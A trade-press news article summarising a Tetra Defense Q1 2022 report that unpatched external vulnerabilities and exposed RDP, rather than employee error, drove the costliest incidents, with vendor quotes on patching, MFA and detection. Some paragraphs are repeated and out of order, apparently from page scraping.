Tetra Defense: Unpatched Systems Behind Costliest Cyberattacks in Q1
Log4J/Log4Shell is still being actively exploited.
![Software patch Software patch](https://eu-images.contentstack.com/v3/assets/blt10e444bce2d36aa8/blt7e236dba0bdd7214/652422f5cee0130405673a21/3-Software-Patch-1.jpg?width=700&auto=webp&quality=80&disable=upscale)
Shutterstock
During the first quarter, 82% of incidents responded to by Tetra Defense were caused by the external exposure of a known vulnerability on the victim’s network or a RDP.
Tetra Defense classifies external exposures in two ways:
External vulnerabilities, which could have been mitigated through publicly available security patches and software updates. In these instances, a threat actor utilized a known vulnerability to gain access to the network before the internal organization was able to patch the system. In the first quarter, 57% of total incidents were caused by the exploitation of external vulnerabilities.
Risky external exposures, which are IT practices such as leaving an RDP port open to the public internet. These behaviors are considered risky because the mitigation relies on an organization’s continued security vigilance and willingness to enforce consistent standards over long periods of time. In the first quarter, 25% of total incidents Tetra Defense handled were caused by risky external exposures.
Incidents caused by unpatched systems cost organizations 54% more than those caused by employee error, according to Tetra Defense.
The most common incidents, those with the root point of compromise (RPOC) linked to an externally facing vulnerability, are also the most expensive to recover from. The cost of an incident response engagement can vary wildly based on the size of the organization and scope of the incident response activities.
Typically, organizations don’t have the ability to test patching outside of their production environment, said Arctic Wolf’s Scott Holewinski.
“It is not uncommon for IT departments to delay patching in fear of impacting production, and business owners will often accept the risk that is associated with it,” he said. “Patching isn’t a one-and-done. It’s a task that requires constant maintenance and monitoring. Unfortunately, as IT and security teams are spread thin, patching often falls by the wayside. Patching is integral to protection against exploits. As soon as a proof of concept (PoC) is made public on the dark web or more legitimate forums like GitHub, most vendors will develop a patch. It’s critical to stay on top of guidance from industry organizations like (ISC)2 or federal authorities like the Cybersecurity and Infrastructure Security Agency (CISA) to prioritize the exploits that pose the highest risk to your organization.”
Log4J/Log4Shell is still being actively exploited, but the significant global attention of the vulnerability has prevented ongoing widespread exploitation, according to Tetra Defense.
Despite widespread attention brought to Log4J/Log4Shell vulnerabilities last December, as the calendar ticked forward into the new year, it was only the third most exploited external exposure in the quarter, accounting for 22% of Tetra Defense’s total incident response cases. Leading the way, and accounting for 33% of cases, were a series of Microsoft Exchange vulnerabilities known as ProxyShell, which were originally disclosed in August 2021.
“The most common system we see the Log4J vulnerability exploited on is VMware Horizon,” Holewinski said. “This is not because the attackers know exactly how to trigger the Log4J exploit on VMware Horizon, which makes it a repeatable process. Anyone who hasn’t fully updated Log4J to a non-vulnerable version is still at risk. That level of risk depends on how readily exploitable the outdated system is.”
Compromised credentials still account for a number of incidents, underscoring the need for more organizations to adopt MFA and implement dark web monitoring, according to Tetra Defense.
In some instances, these incidents are from threat actors brute-force attacking systems username and password combinations. But in many of these cases, password reuse is to blame from employees using the same username and password across multiple sites. If one of the sites experiences a breach and the credentials are leaked to the dark web, those credentials can be used to compromise other systems where the same pair of username and password is used.
With MFA in place, exploitation of compromised credentials becomes more challenging because even if a threat actor has a known username and password pair, the account remains inaccessible without a second factor of authentication such as an app push notification, text message or security challenge question.
Across Tetra Defense’s cases and all publicly observed attacks by e-crime groups on the dark web, there was unsurprisingly a diverse number of threat actor groups observed. With such a large number of groups being actively observed, it highlights the constant challenges organization have in protecting themselves. That’s because if even one group becomes inactive or is taken down by law enforcement, there remain dozens of other groups actively trying to compromise them.
“Vulnerabilities will likely continue to be highly exploited as the RPOC,” Holewinski said. “Over the last five years, the vulnerabilities may have changed, but externally accessible vulnerabilities overall will continue to be a favorite attack vector for threat actors.”
Aimei Wei is CTO and co-founder of Stellar Cyber. She said patching definitely pays off for known vulnerabilities and it greatly reduces the attack surface.
“However, it is hard to guarantee that the patch is always immediately available for the software version you are using and can be applied in time,” she said. “[An] organization’s continued security vigilance and enforcement of standards can dramatically reduce the chances for exploitation from exposed risks. However, the exposed risk, even for a short period of time, may still be exploited. Having a detection and response system that can continuously monitor the environment, detect the exploitation and stop the attack from progression to an incident covers the cases missed by not in-time patch or not consistent enforcement, or short period of time for exposed risks.”
Mark Bower is vice president of product management at Anjuna Security.
“The report once again highlights the simple fact that in an ideal world, enterprises would patch and monitor untrusted compute and networks to keep data safe from leakage,” he said. “But in truth, it’s impossible to continuously down tools and close all risk gaps that affect modern business success. Vulnerabilities exist because they are discovered. But until that point, they are also exploitable holes in systems or processes. However, modern computing today is beginning to provide fresh new approaches to address risks like this. And we will start to see that at scale and in short order with compute ecosystems that shrink attack surfaces inherently for data at rest, in motion and in use.”
Mark Bower is vice president of product management at Anjuna Security.
“The report once again highlights the simple fact that in an ideal world, enterprises would patch and monitor untrusted compute and networks to keep data safe from leakage,” he said. “But in truth, it’s impossible to continuously down tools and close all risk gaps that affect modern business success. Vulnerabilities exist because they are discovered. But until that point, they are also exploitable holes in systems or processes. However, modern computing today is beginning to provide fresh new approaches to address risks like this. And we will start to see that at scale and in short order with compute ecosystems that shrink attack surfaces inherently for data at rest, in motion and in use.”
Unpatched systems – not employee error – prompted the most costly cyberattacks during the first quarter of 2022.
That’s according to a new Q1 2022 report by Tetra Defense, an Arctic Wolf company. Each quarter, Arctic Wolf‘s Tetra Defense collects and analyzes data and insights from its incident response engagements in the United States.
Scott Holewinski is Arctic Wolf‘s senior vice president and general manager of incident response.
Arctic Wolf’s Scott Holewinski
“User action is often touted in the media as a top point of compromise, with the fear-mongering attached,” he said. “Reports that someone from HR clicked on a link and single-handedly invited a ransomware attack into their organization are a cautionary tale used by many vendors and employers alike to articulate the consequences of a simple user action.”
User action can be a piece of a threat actor’s strategy, Holewinski said. However, it’s not the easiest way in, nor is it the most popular.
Encouraging Findings
Holewinski said there are a lot of encouraging findings in this report.
“The most significant is that 82% of major cyber incidents are preventable by making sure your organization does not have any vulnerabilities on the perimeter of the network and do not allow external remote desktop protocol (RDP) access directly to workstations or servers,” he said. “If you combine that with using multifactor authentication (MFA), user awareness training, and some level of managed detection and response, your organization will no longer be low-hanging fruit for a major cyber incident. A lot of these are economical to implement. Other than the people time, patching vulnerabilities is usually free.”
Scroll through our slideshow above for more from Tetra Defense’s report on the cost of unpatched systems and more.
Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn. |
About the Author(s)
You May Also Like